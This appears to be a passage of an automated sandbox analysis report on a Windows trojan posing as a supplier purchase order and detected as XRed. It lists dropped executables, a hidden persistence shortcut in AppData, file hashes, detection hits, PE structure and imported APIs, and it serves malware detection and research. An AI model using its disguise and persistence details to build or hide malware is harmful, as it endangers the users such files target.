                                                                                                                                SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                Malicious:false
                                                                                                                                Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):3.746897789531007
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Tue Dec 24 16:20:00 2024, mtime=Tue Dec 24 16:20:00 2024, atime=Tue Dec 24 16:20:00 2024, length=913408, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1805
                                                                                                                                Entropy (8bit):3.4328819700053814
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:8ST6d+SDaeL+IJCA7D6jkrE2+s9T4IlQpLzBm:8STYa++Uhlbr9MIlQv
                                                                                                                                MD5:0F6D83AF2A907A1960A58F258B4BAA16
                                                                                                                                SHA1:567975E3280D5C18FC11AAB7D0E11E2ED0B26BA8
                                                                                                                                SHA-256:AD7987DE3F34FC51F833538F0730020BE364D4CD67F7E58892BF7FD0ED7D1580
                                                                                                                                SHA-512:397D8389234E0A1559FD092B6F6BC86F5B99B03EA015FDDE03278DC0A561BAFB8F354CA9F5D1A9CE2ADCF27F031963272918F1F443F1E12EE0BC51DDAF8885DD
                                                                                                                                Malicious:false
                                                                                                                                Preview:L..................F.@.. .......(V..f...(V..f...(V............................:..DG..Yr?.D..U..k0.&...&......vk.v....1...(V......(V......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y}............................%..A.p.p.D.a.t.a...B.V.1......Yz...Roaming.@......CW.^.Yz............................+..R.o.a.m.i.n.g.....V.1......Y....Windata.@......Y...Y............................q...W.i.n.d.a.t.a.....`.2......Y.. .NUHORT.exe..F......Y...Y......i.........................N.U.H.O.R.T...e.x.e.......`...............-......._..............4.....C:\Users\user\AppData\Roaming\Windata\NUHORT.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.N.U.H.O.R.T...e.x.e.).".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...............................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):913408
                                                                                                                                Entropy (8bit):7.877743429478407
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:ahloDX0XOf4+0kRKqh1XZWJFCc7j79nhF8R:ahloJfKoKqh1X+T9f8
                                                                                                                                MD5:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                SHA1:BE8784D03A832AADDFDCD53A0D337FBFBF100EE6
                                                                                                                                SHA-256:0B9A5D51C56644ECD7A0B0B9F31533DA83D1D16D6FD2DB55BBCDA7B095CA8FDB
                                                                                                                                SHA-512:29616B472141370252C58C827D733864A119FE87590AA3F2E41AC61CAD18BC717DE9AFCADEBFC4BFC0171EE54BC8126EFCEDD119AEA67E260795D187F4BC2C87
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....[jg.........."......P........... .......0....@.......................................@...@.......@.........................$....0..............................................................."..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                                Process:C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):913408
                                                                                                                                Entropy (8bit):7.877743429478407
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:ahloDX0XOf4+0kRKqh1XZWJFCc7j79nhF8R:ahloJfKoKqh1X+T9f8
                                                                                                                                MD5:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                SHA1:BE8784D03A832AADDFDCD53A0D337FBFBF100EE6
                                                                                                                                SHA-256:0B9A5D51C56644ECD7A0B0B9F31533DA83D1D16D6FD2DB55BBCDA7B095CA8FDB
                                                                                                                                SHA-512:29616B472141370252C58C827D733864A119FE87590AA3F2E41AC61CAD18BC717DE9AFCADEBFC4BFC0171EE54BC8126EFCEDD119AEA67E260795D187F4BC2C87
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....[jg.........."......P........... .......0....@.......................................@...@.......@.........................$....0..............................................................."..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:Microsoft Excel 2007+
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):18387
                                                                                                                                Entropy (8bit):7.523057953697544
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                Malicious:false
                                                                                                                                Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):165
                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                Malicious:false
                                                                                                                                Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):771584
                                                                                                                                Entropy (8bit):6.6311521779536164
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I+mr:ansJ39LyjbJkQFMhmC+6GD9f6
                                                                                                                                MD5:B30E717CDE0FA4A5DE907A7148308430
                                                                                                                                SHA1:C342E26972C1EE78B8409998386E0212234F6B80
                                                                                                                                SHA-256:12C8A50563F8B33F2613CA55AEE26FBE5473D68593D8E10E13C4D44D258B4E2A
                                                                                                                                SHA-512:B6FEB72243722ABE8F7E35784ABC386D9373BD652722334A1E2FB5B614CD857E1EB8A44C7593D2C1AB347C490E63371D3AB5FA4698D3BF3A63EC88A897A7440C
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1835008
                                                                                                                                Entropy (8bit):4.465648395439585
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:GIXfpi67eLPU9skLmb0b4pWSPKaJG8nAgejZMMhA2gX4WABl0uN9dwBCswSb8:rXD94pWlLZMM6YFHf+8
                                                                                                                                MD5:19279408D4D15E3E28170FC197102485
                                                                                                                                SHA1:BEC5D96F581EE7E7DB8D274F844C373AF35ED895
                                                                                                                                SHA-256:FBC88BC1D2599309F74C506CEBEF032E760A629BC125B5AE8D6DE545610D5E96
                                                                                                                                SHA-512:38037D1B250E85319D966064AC6B2383D8588F4D286222B4E35D767B4D39FE1F2C0391F4566C93DAE05BF29B56E57691B3ECA9DB7DAAEEC9160599F2A2D073D1
                                                                                                                                Malicious:false
                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):7.4649180860888515
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                                • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                                • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                                • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                                • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                                File name:New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File size:1'684'992 bytes
                                                                                                                                MD5:17fb4f9df5175e684a3427c5997b2007
                                                                                                                                SHA1:c7b207497e0171fbb8fca648d82753abbf42b0b8
                                                                                                                                SHA256:8f66247597f18a7b3f20dbdf2d29330f716222bd500a7a95642137e84fa3b3d3
                                                                                                                                SHA512:ed454b9588ab5209a926395c03b7e1ee35231bb77f66895187ebe86a3e94fc3568a247983946021887def3e4f396705142134abfdeb857b9e040dd863fe6d51d
                                                                                                                                SSDEEP:49152:gnsHyjtk2MYC5GDGfhloJfKoKqh1X+T9f8z:gnsmtk2aNfhlHoKqzX+Sz
                                                                                                                                TLSH:5475D032F2D18877D1331A399C6B93A4542ABE512D38794E3BE93E4D5F3A34238652D3
                                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                Icon Hash:0fd88dc89ea7861b
                                                                                                                                Entrypoint:0x49ab80
                                                                                                                                Entrypoint Section:CODE
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                DLL Characteristics:
                                                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                                                Instruction
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                add esp, FFFFFFF0h
                                                                                                                                mov eax, 0049A778h
                                                                                                                                call 00007F9210C01B5Dh
                                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                call 00007F9210C554A5h
                                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                mov edx, 0049ABE0h
                                                                                                                                call 00007F9210C550A4h
                                                                                                                                mov ecx, dword ptr [0049DBDCh]
                                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                mov edx, dword ptr [00496590h]
                                                                                                                                call 00007F9210C55494h
                                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                call 00007F9210C55508h
                                                                                                                                call 00007F9210BFF63Bh
                                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0xf0d30 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0xf0d30 | 0xf0e00 | ce772b0dddbf59f827d11ea4d655154c | False | 0.8987446078749352 | data | 7.78380068008817 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" |  |  | 0.38636363636363635
RT_CURSOR | 0xb0efc | 0x134 | data |  |  | 0.4642857142857143
RT_CURSOR | 0xb1030 | 0x134 | data |  |  | 0.4805194805194805
RT_CURSOR | 0xb1164 | 0x134 | data |  |  | 0.38311688311688313
RT_CURSOR | 0xb1298 | 0x134 | data |  |  | 0.36038961038961037
RT_CURSOR | 0xb13cc | 0x134 | data |  |  | 0.4090909090909091
RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" |  |  | 0.4967532467532468
RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.43103448275862066
RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 |  |  | 0.46487603305785125
RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.43103448275862066
RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39870689655172414
RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.4245689655172414
RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5021551724137931
RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5064655172413793
RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39655172413793105
RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5344827586206896
RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39655172413793105
RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 |  |  | 0.4870689655172414
RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 |  |  | 0.24179174484052532
RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516
RT_DIALOG | 0xb4aa0 | 0x52 | data |  |  | 0.7682926829268293
RT_STRING | 0xb4af4 | 0x358 | data |  |  | 0.3796728971962617
RT_STRING | 0xb4e4c | 0x428 | data |  |  | 0.37406015037593987
RT_STRING | 0xb5274 | 0x3a4 | data |  |  | 0.40879828326180256
RT_STRING | 0xb5618 | 0x3bc | data |  |  | 0.33472803347280333
RT_STRING | 0xb59d4 | 0x2d4 | data |  |  | 0.4654696132596685
RT_STRING | 0xb5ca8 | 0x334 | data |  |  | 0.42804878048780487
RT_STRING | 0xb5fdc | 0x42c | data |  |  | 0.42602996254681647
RT_STRING | 0xb6408 | 0x1f0 | data |  |  | 0.4213709677419355
RT_STRING | 0xb65f8 | 0x1c0 | data |  |  | 0.44419642857142855
RT_STRING | 0xb67b8 | 0xdc | data |  |  | 0.6
RT_STRING | 0xb6894 | 0x320 | data |  |  | 0.45125
RT_STRING | 0xb6bb4 | 0xd8 | data |  |  | 0.5879629629629629
RT_STRING | 0xb6c8c | 0x118 | data |  |  | 0.5678571428571428
RT_STRING | 0xb6da4 | 0x268 | data |  |  | 0.4707792207792208
RT_STRING | 0xb700c | 0x3f8 | data |  |  | 0.37598425196850394
RT_STRING | 0xb7404 | 0x378 | data |  |  | 0.41103603603603606
RT_STRING | 0xb777c | 0x380 | data |  |  | 0.35379464285714285
RT_STRING | 0xb7afc | 0x374 | data |  |  | 0.4061085972850679
RT_STRING | 0xb7e70 | 0xe0 | data |  |  | 0.5535714285714286
RT_STRING | 0xb7f50 | 0xbc | data |  |  | 0.526595744680851
RT_STRING | 0xb800c | 0x368 | data |  |  | 0.40940366972477066
RT_STRING | 0xb8374 | 0x3fc | data |  |  | 0.34901960784313724
RT_STRING | 0xb8770 | 0x2fc | data |  |  | 0.36649214659685864
RT_STRING | 0xb8a6c | 0x354 | data |  |  | 0.31572769953051644
RT_RCDATA | 0xb8dc0 | 0x44 | data |  |  | 0.8676470588235294
RT_RCDATA | 0xb8e04 | 0x10 | data |  |  | 1.5
RT_RCDATA | 0xb8e14 | 0xdf000 | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed |  |  | 0.931114025714686
RT_RCDATA | 0x197e14 | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665
RT_RCDATA | 0x197e18 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875
RT_RCDATA | 0x19ba18 | 0x64c | data |  |  | 0.5998759305210918
RT_RCDATA | 0x19c064 | 0x153 | Delphi compiled form 'TFormVir' |  |  | 0.7522123893805309
RT_RCDATA | 0x19c1b8 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957
RT_GROUP_CURSOR | 0x1a098c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.25
RT_GROUP_CURSOR | 0x1a09a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.25
RT_GROUP_CURSOR | 0x1a09b4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0x1a09c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0x1a09dc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0x1a09f0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0x1a0a04 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_ICON | 0x1a0a18 | 0x14 | data | Turkish | Turkey | 1.1
RT_VERSION | 0x1a0a2c | 0x304 | data | Turkish | Turkey | 0.42875647668393785
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
